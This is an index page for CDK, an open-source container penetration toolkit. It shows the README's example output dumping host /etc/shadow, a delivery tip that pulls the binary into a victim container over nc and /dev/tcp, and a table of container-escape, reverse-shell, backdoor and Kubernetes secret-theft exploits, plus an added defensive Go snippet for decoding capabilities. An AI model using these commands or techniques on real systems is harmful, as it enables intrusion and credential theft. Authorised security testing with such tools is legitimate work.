
github.com/cdk-team/CDK @v1.5.6 sqlite

508 symbols · 1,372 edges · 116 files · 96 documented (19%) · 28 cross-repo links
README

CDK - Zero Dependency Container Penetration Toolkit


Legal Disclaimer

Usage of CDK for attacking targets without prior mutual consent is illegal. CDK is for security testing purposes only.

Overview

CDK is an open-source container penetration toolkit, designed to offer stable exploitation in different slimmed containers without any OS dependency. It comes with useful net-tools and many powerful PoCs/EXPs and helps you escape containers and take over K8s clusters easily.

Quick Start

Run cdk eva to gather evaluation info and a recommended exploit, then run cdk run to start the attack.

> ./cdk eva --full

[*] Maybe you can exploit the *Capabilities* below:
[!] CAP_DAC_READ_SEARCH enabled. You can read files from host. Use 'cdk run cap-dac-read-search' ... for exploitation.
[!] CAP_SYS_MODULE enabled. You can escape the container via loading kernel module. More info at https://xcellerator.github.io/posts/docker_escape/.
Critical - SYS_ADMIN Capability Found. Try 'cdk run rewrite-cgroup-devices/mount-cgroup/...'.
Critical - Possible Privileged Container Found.

> ./cdk run cap-dac-read-search

Running with target: /etc/shadow, ref: /etc/hostname
ubuntu:$6$*******:19173:0:99999:7:::
root:*:18659:0:99999:7:::
daemon:*:18659:0:99999:7:::
bin:*:18659:0:99999:7:::

Installation/Delivery

Download the latest release from https://github.com/cdk-team/CDK/releases/

Drop executable files into the target container and start testing.

TIPS: Delivering CDK into a target container in real-world penetration testing

If you have an exploit that can upload a file, you can upload the CDK binary directly.

If you have an RCE exploit but the target container has no curl or wget, you can use the following method to deliver CDK:

  1. First, host the CDK binary on a host with a public IP:
(on your host)
nc -lvp 999 < cdk
  2. Inside the victim container, execute:
cat < /dev/tcp/(your_public_host_ip)/(port) > cdk
chmod a+x cdk

Usage

Usage:
  cdk evaluate [--full]
  cdk run (--list | <exploit> [<args>...])
  cdk <tool> [<args>...]

Evaluate:
  cdk evaluate                              Gather information to find weakness inside container.
  cdk evaluate --full                       Enable file scan during information gathering.

Exploit:
  cdk run --list                            List all available exploits.
  cdk run <exploit> [<args>...]             Run single exploit, docs in https://github.com/cdk-team/CDK/wiki

Tool:
  vi <file>                                 Edit files in container like "vi" command.
  ps                                        Show process information like "ps -ef" command.
  nc [options]                              Create TCP tunnel.
  ifconfig                                  Show network information.
  kcurl <path> (get|post) <uri> <data>      Make request to K8s api-server.
  ectl <endpoint> get <key>                 Unauthorized enumeration of etcd keys.
  ucurl (get|post) <socket> <uri> <data>    Make request to docker unix socket.
  probe <ip> <port> <parallel> <timeout-ms> TCP port scan, example: cdk probe 10.0.1.0-255 80,8080-9443 50 1000

Options:
  -h --help     Show this help msg.
  -v --version  Show version.
  --profile=<name> Select evaluation profile.

Features

CDK has three modules:

  1. Evaluate: gather information inside the container to find potential weaknesses.
  2. Exploit: container escaping, persistence and lateral movement.
  3. Tool: network tools and APIs for TCP/HTTP requests, tunnels and K8s cluster management.

Evaluate Module

Usage

cdk evaluate [--full]
Tactics               | Script Supported                          | Usage/Example
Information Gathering | OS Basic Info                             | link
Information Gathering | Available Capabilities                    | link
Information Gathering | Available Linux Commands                  | link
Information Gathering | Mounts                                    | link
Information Gathering | Net Namespace                             | link
Information Gathering | Sensitive ENV                             | link
Information Gathering | Sensitive Process                         | link
Information Gathering | Sensitive Local Files                     | link
Information Gathering | Kube-proxy Route Localnet (CVE-2020-8558) | link
Information Gathering | DNS-Based Service Discovery               | link
Discovery             | K8s Api-server Info                       | link
Discovery             | K8s Service-account Info                  | link
Discovery             | Cloud Provider Metadata API               | link
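The Available Capabilities check in the table above comes down to decoding the CapEff bitmask in /proc/self/status. The following Go program is an added example, not code from the CDK repository: it parses that mask and reports the three capabilities the Quick Start output flags (CAP_DAC_READ_SEARCH, CAP_SYS_MODULE, CAP_SYS_ADMIN). capNames, dangerous, SampleStatus, CapEffFromStatus and DecodeCaps are names chosen here, and SampleStatus is a constructed status excerpt.

```go
package main

import (
	"errors"
	"strconv"
	"strings"
)

// Capability names in bit order, per linux/capability.h (bit 0 = CAP_CHOWN, bit 40 = CAP_CHECKPOINT_RESTORE).
var capNames = []string{
	"CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_DAC_READ_SEARCH", "CAP_FOWNER", "CAP_FSETID", "CAP_KILL", "CAP_SETGID",
	"CAP_SETUID", "CAP_SETPCAP", "CAP_LINUX_IMMUTABLE", "CAP_NET_BIND_SERVICE", "CAP_NET_BROADCAST", "CAP_NET_ADMIN",
	"CAP_NET_RAW", "CAP_IPC_LOCK", "CAP_IPC_OWNER", "CAP_SYS_MODULE", "CAP_SYS_RAWIO", "CAP_SYS_CHROOT", "CAP_SYS_PTRACE",
	"CAP_SYS_PACCT", "CAP_SYS_ADMIN", "CAP_SYS_BOOT", "CAP_SYS_NICE", "CAP_SYS_RESOURCE", "CAP_SYS_TIME", "CAP_SYS_TTY_CONFIG",
	"CAP_MKNOD", "CAP_LEASE", "CAP_AUDIT_WRITE", "CAP_AUDIT_CONTROL", "CAP_SETFCAP", "CAP_MAC_OVERRIDE", "CAP_MAC_ADMIN",
	"CAP_SYSLOG", "CAP_WAKE_ALARM", "CAP_BLOCK_SUSPEND", "CAP_AUDIT_READ", "CAP_PERFMON", "CAP_BPF", "CAP_CHECKPOINT_RESTORE",
}

// The capabilities the README's `cdk eva` output reports as escape-relevant findings.
var dangerous = map[string]bool{"CAP_DAC_READ_SEARCH": true, "CAP_SYS_MODULE": true, "CAP_SYS_ADMIN": true}

// SampleStatus is a constructed /proc/self/status excerpt: the Docker default capability set
// (00000000a80425fb) plus CAP_DAC_READ_SEARCH (bit 2), CAP_SYS_MODULE (bit 16) and CAP_SYS_ADMIN (bit 21).
const SampleStatus = "Name:\tsh\nCapInh:\t0000000000000000\nCapPrm:\t00000000a82525ff\nCapEff:\t00000000a82525ff\n"

// CapEffFromStatus extracts the hex CapEff mask from /proc/<pid>/status text.
func CapEffFromStatus(status string) (uint64, error) {
	for _, line := range strings.Split(status, "\n") {
		if strings.HasPrefix(line, "CapEff:") {
			return strconv.ParseUint(strings.TrimSpace(strings.TrimPrefix(line, "CapEff:")), 16, 64)
		}
	}
	return 0, errors.New("no CapEff line in status text")
}

// DecodeCaps names every capability bit set in mask; with onlyDangerous it keeps just the findings.
func DecodeCaps(mask uint64, onlyDangerous bool) []string {
	var names []string
	for bit, name := range capNames {
		if mask&(1<<uint(bit)) != 0 && (!onlyDangerous || dangerous[name]) {
			names = append(names, name)
		}
	}
	return names
}
```

Run it against the real /proc/self/status of a container you operate to confirm hardening: the Docker default set 00000000a80425fb decodes to 14 capabilities with no findings, so any finding means the container was granted extra capabilities or runs privileged.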

Exploit Module

List all available exploits:

cdk run --list

Run targeted exploit:

cdk run <script-name> [options]
Tactic               | Technique                                                   | CDK Exploit Name       | Doc
Escaping             | docker-runc CVE-2019-5736                                   | runc-pwn               |
Escaping             | containerd-shim CVE-2020-15257                              | shim-pwn               | link
Escaping             | docker.sock PoC (DIND attack)                               | docker-sock-check      | link
Escaping             | docker.sock RCE                                             | docker-sock-pwn        | link
Escaping             | Docker API(2375) RCE                                        | docker-api-pwn         | link
Escaping             | Device Mount Escaping                                       | mount-disk             | link
Escaping             | LXCFS Escaping                                              | lxcfs-rw               | link
Escaping             | Cgroups Escaping                                            | mount-cgroup           | link
Escaping             | Abuse Unprivileged User Namespace Escaping CVE-2022-0492    | abuse-unpriv-userns    | link
Escaping             | Procfs Escaping                                             | mount-procfs           | link
Escaping             | Ptrace Escaping PoC                                         | check-ptrace           | link
Escaping             | Rewrite Cgroup(devices.allow)                               | rewrite-cgroup-devices | link
Escaping             | Read arbitrary file from host system (CAP_DAC_READ_SEARCH)  | cap-dac-read-search    | link
Discovery            | K8s Component Probe                                         | service-probe          | link
Discovery            | Dump Istio Sidecar Meta                                     | istio-check            | link
Discovery            | Dump K8s Pod Security Policies                              | k8s-psp-dump           | link
Remote Control       | Reverse Shell                                               | reverse-shell          | link
Remote Control       | Kubelet Exec                                                | kubelet-exec           |
Credential Access    | Registry BruteForce                                         | registry-brute         | link
Credential Access    | Access Key Scanning                                         | ak-leakage             | link
Credential Access    | Etcd Get K8s Token                                          | etcd-get-k8s-token     |
Credential Access    | Dump K8s Secrets                                            | k8s-secret-dump        | link
Credential Access    | Dump K8s Config                                             | k8s-configmap-dump     | link
Privilege Escalation | K8s RBAC Bypass                                             | k8s-get-sa-token       | link
Persistence          | Deploy WebShell                                             | webshell-deploy        | link
Persistence          | Deploy Backdoor Pod                                         | k8s-backdoor-daemonset | link
Persistence          | Deploy Shadow K8s api-server                                | k8s-shadow-apiserver   | link
Persistence          | K8s MITM Attack (CVE-2020-8554)                             | k8s-mitm-clusterip     | link
Persistence          | Deploy K8s CronJob                                          | k8s-cronjob            | link

Note about Thin: The thin release is prepared for

Extension points (exported contracts): how you extend this code

CheckFunc (FuncType)
CheckFunc represents the executable unit for a security check.
pkg/evaluate/engine.go
TaskInterface (Interface)
(no doc) [1 implementer]
pkg/plugin/interface.go
ExploitInterface (Interface)
(no doc)
pkg/plugin/interface.go

Core symbols (most depended-on inside this repo)

inside_container_cmd
called by 43
test/CDK-deploy-test/lib/ssh_remote_action.py
RegisterExploit
called by 33
pkg/plugin/interface.go
String
called by 29
pkg/util/cgroup.go
ServerAccountRequest
called by 26
pkg/tool/kubectl/common.go
Close
called by 24
pkg/util/colorful.go
RegisterSimpleCheck
called by 22
pkg/evaluate/registry.go
check_host_exec
called by 21
test/CDK-deploy-test/lib/ssh_remote_action.py
logf
called by 18
pkg/tool/netcat/netcat.go

Shape

Function 291
Struct 108
Method 100
Class 5
Interface 2
FuncType 1
TypeAlias 1

Languages

Go 95%
Python 5%

Modules by API surface

pkg/util/kubelet_api.go                 26 symbols
pkg/evaluate/registry.go                19 symbols
pkg/evaluate/engine.go                  17 symbols
pkg/plugin/interface.go                 14 symbols
pkg/util/cgroup.go                      12 symbols
pkg/tool/netcat/netcat.go               12 symbols
pkg/util/colorful.go                    10 symbols
pkg/util/file_io.go                      9 symbols
pkg/exploit/escaping/mount_procfs.go     9 symbols
pkg/exploit/escaping/lxcfs_rw_mknod.go   9 symbols
pkg/exploit/escaping/lxcfs_rw_cgroup.go  9 symbols
pkg/util/kubectl.go                      8 symbols

Dependencies (from manifests, versioned)

github.com/axgle/mahonia v0.0.0-2018020800282 · 1×
github.com/bkthomps/Ven v0.5.0 · 1×
github.com/containerd/ttrpc v1.0.2 · 1×
github.com/docopt/docopt-go v0.0.0-2018011123173 · 1×
github.com/idoubi/goz v1.0.0 · 1×
github.com/kr/pretty v0.2.1 · 1×
